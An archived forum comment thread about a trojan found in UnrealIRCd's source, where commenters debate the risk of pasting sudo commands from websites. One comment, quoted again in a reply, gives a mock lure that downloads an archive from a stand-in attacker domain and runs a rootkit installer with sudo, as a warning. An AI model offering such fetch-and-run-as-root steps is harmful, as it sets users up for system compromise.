Linked by Jordan Spencer Cunningham on Mon 14th Jun 2010 23:58 UTC
Bugs & Viruses Recently, the Linux version of UnrealIRCd was discovered to have had a Trojan worm its way into the source code. Even more embarrassing for the developers of Unreal is that the Trojan's been holding open the backdoor in the source code since November of 2009-- not very recently. And, of course, bloggers and press in general are taking the opportunity of another breach in Linux security to point out doomsday devices that don't really exist.
Thread beginning with comment 430078
To view parent comment, click here.
To read all comments associated with this story, please click here.
RE[5]: Comment by lemur2
by stew on Tue 15th Jun 2010 09:33 UTC in reply to "RE[4]: Comment by lemur2"
stew
Member since:
2005-07-06

Are you seriously suggesting that copy&pasting commands that one doesn't understand from some web site is a safe thing to do? If you're training users to just blindly type 'sudo' commands without understanding what they do, you're creating a large opportunity for social engineering:

To get the latest Firefox with instant Facebook updates, type these commands:
1. wget http://thehax0rzplaze.com/infectedFireFox.tgz
2. tar zxvf infectedFireFox.tgz
3. sudo infectedFireFox/installRootKit.sh
then type your password.

Edited 2010-06-15 09:35 UTC

Reply Parent Score: 9

RE[6]: Comment by lemur2
by lemur2 on Tue 15th Jun 2010 09:58 in reply to "RE[5]: Comment by lemur2"
lemur2 Member since:
2007-02-17

Are you seriously suggesting that copy&pasting commands that one doesn't understand from some web site is a safe thing to do? If you're training users to just blindly type 'sudo' commands without understanding what they do, you're creating a large opportunity for social engineering:

To get the latest Firefox with instant Facebook updates, type these commands:
1. wget http://thehax0rzplaze.com/infectedFireFox.tgz
2. tar zxvf infectedFireFox.tgz
3. sudo infectedFireFox/installRootKit.sh
then type your password.


Strangely enough, what you just described is the very means by which one had to install the UnrealIRCd trojan.

You do have a point. I would first caution uses to look for the keyword "signed" and "open source" on the source page.

Like this one has:
https://launchpad.net/~ubuntu-mozilla-daily/+archive/ppa

It says: "daily (or even multiple builds per day) for various mozilla projects and branches". Mozilla is open source.

It also says: "You can update your system with unsupported packages from this untrusted PPA by adding ppa:ubuntu-mozilla-daily/ppa to your system's Software Sources" so it warns you about what you are doing. There is no attempt at trickery of social engineering here, this is definitely a potential system-breaker thing to do.

The thing is, you can do it. You can participate in the cutting-edge development of Mozilla, via running, testing and reporting on the very latest build. Don't do this on anything other than a test system, however ... because, as it warns you, this is untrusted. Don't trust it on a system with anything important on it.

This is most decidedly a "user beware" operation. We are talking here about unstable nightly development builds, after all.

Edited 2010-06-15 10:03 UTC

Reply Parent Score: 2

jabbotts Member since:
2007-09-06

"Firefox can't find the server at www.thehax0rzplaze.com"


No Fair! It won't let me in!

(I kid, of course though i would have laughed pretty hard if the domain did exist)

Reply Parent Score: 2